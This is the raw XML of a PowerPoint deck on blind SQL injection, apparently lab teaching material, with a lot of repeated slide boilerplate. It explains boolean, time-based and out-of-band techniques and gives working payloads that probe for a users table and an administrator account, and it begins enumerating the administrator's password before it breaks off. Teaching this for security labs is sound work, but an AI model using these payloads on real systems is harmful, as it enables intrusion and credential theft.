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2A4B1253-A14A-4C8F-8939-C015B63A89EB}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>14/09/2022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C896B46-3F71-4167-BBAE-29801172DE0D}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2179217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A4B1253-A14A-4C8F-8939-C015B63A89EB}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>14/09/2022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C896B46-3F71-4167-BBAE-29801172DE0D}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="789198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A4B1253-A14A-4C8F-8939-C015B63A89EB}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>14/09/2022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C896B46-3F71-4167-BBAE-29801172DE0D}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2250703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A4B1253-A14A-4C8F-8939-C015B63A89EB}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>14/09/2022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C896B46-3F71-4167-BBAE-29801172DE0D}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1787934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4B1253-A14A-4C8F-8939-C015B63A89EB}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>14/09/2022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C896B46-3F71-4167-BBAE-29801172DE0D}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4176590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2A4B1253-A14A-4C8F-8939-C015B63A89EB}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>14/09/2022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C896B46-3F71-4167-BBAE-29801172DE0D}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="887418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2A4B1253-A14A-4C8F-8939-C015B63A89EB}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>14/09/2022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C896B46-3F71-4167-BBAE-29801172DE0D}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4118273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2A4B1253-A14A-4C8F-8939-C015B63A89EB}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>14/09/2022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C896B46-3F71-4167-BBAE-29801172DE0D}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67625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4B1253-A14A-4C8F-8939-C015B63A89EB}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>14/09/2022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C896B46-3F71-4167-BBAE-29801172DE0D}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2653703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4B1253-A14A-4C8F-8939-C015B63A89EB}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>14/09/2022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C896B46-3F71-4167-BBAE-29801172DE0D}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3647757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4B1253-A14A-4C8F-8939-C015B63A89EB}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>14/09/2022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C896B46-3F71-4167-BBAE-29801172DE0D}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2697972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4B1253-A14A-4C8F-8939-C015B63A89EB}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>14/09/2022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896B46-3F71-4167-BBAE-29801172DE0D}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2994566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portswigger.net/burp/application-security-testing/oas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portswigger.net/burp/application-security-testing" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/application-security-testing/oast" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.academia.edu/41117452/A_Study_of_Out-of-Band_Structured_Query_Language_Injection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/application-security-testing/dast"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insecure-website.com/products?category=Gifts'+OR+1=1--" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insecure-website.com/products?category=Gift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SQL Injection Lab</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20425115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lgn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blind SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>There are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" u="sng" dirty="0"/>
              <a:t>two types </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>of blind SQL Injection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
              <a:t>-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
              <a:t>time-based.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>This means that the application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>does not return the results of the SQL query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>the details of any database errors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>within its responses. Blind vulnerabilities can still be exploited to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>access unauthorized data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, but the techniques involved are generally </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>more complicated and difficult to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>perform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Depending on the nature of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>vulnerability and the database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>involved, the following techniques can be used to exploit blind SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>vulnerabilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>You can change the logic of the query to trigger a detectable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>difference in the application's response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>depending on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>truth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>of a single condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. This might involve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>injecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> a new condition into some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>Boolean logic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>conditionally triggering an error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>such as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>divide-by-zero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>You can conditionally </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>trigger a time delay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>in the processing of the query, allowing you to infer the truth of the condition based on the time that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>the application takes to respond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>You can trigger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>an out-of-band network interaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>OAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> techniques. This technique is extremely powerful and works in situations where the other techniques do not. Often, you can directly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> data via the out-of-band channel, for example by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>placing the data into a DNS lookup for a domain that you control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>OAST------https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>portswigger.net/burp/application-security-testing/oast</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16189923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GB" b="1" u="sng" dirty="0"/>
              <a:t>Exploiting blind SQL injection by triggering conditional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>responses(Boolean base):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>1.Confirm that the parameter is vulnerable to Blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t> attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>query---&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackingId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackedUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackingId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> = 'rEUHIfcKKKWib5b2'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	if this tracking ID exits on database ---&gt;welcome </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>messege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>---&gt; Query return value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>does't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> exit ------&gt; Query return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>nothing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>2.Check True </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>useCase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackingId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackedUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackingId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> = 'rEUHIfcKKKWib5b2' AND 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>payload: ' AND 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TRUE:Welcome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> Back</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>FALSE:Nothing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> 1=2--(Now we can exploit blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>3.Confirm that we have a users table:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>query--&gt; SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackingId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackedUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackingId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> = 'rEUHIfcKKKWib5b2' AND (SELECT 'a' from users LIMIT 1)='a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>'--		payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>:' AND (SELECT 'a' from users LIMIT 1)='a'--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>				a=any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>number;LIMIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> 1= only for one user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>return Welcome ----&gt; exits users table</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1066766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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>4.Confirm that  username administrator exits on users table:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>query---&gt;SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackingId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackedUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackingId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> = 'rEUHIfcKKKWib5b2' AND (SELECT username from users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>			where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>username='administrator')='administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>'—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>:' AND (SELECT username from users where username='administrator')='administrator'--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>administrator user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exist…..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>5.Enumerate password of the administrator user:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>query---&gt;SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
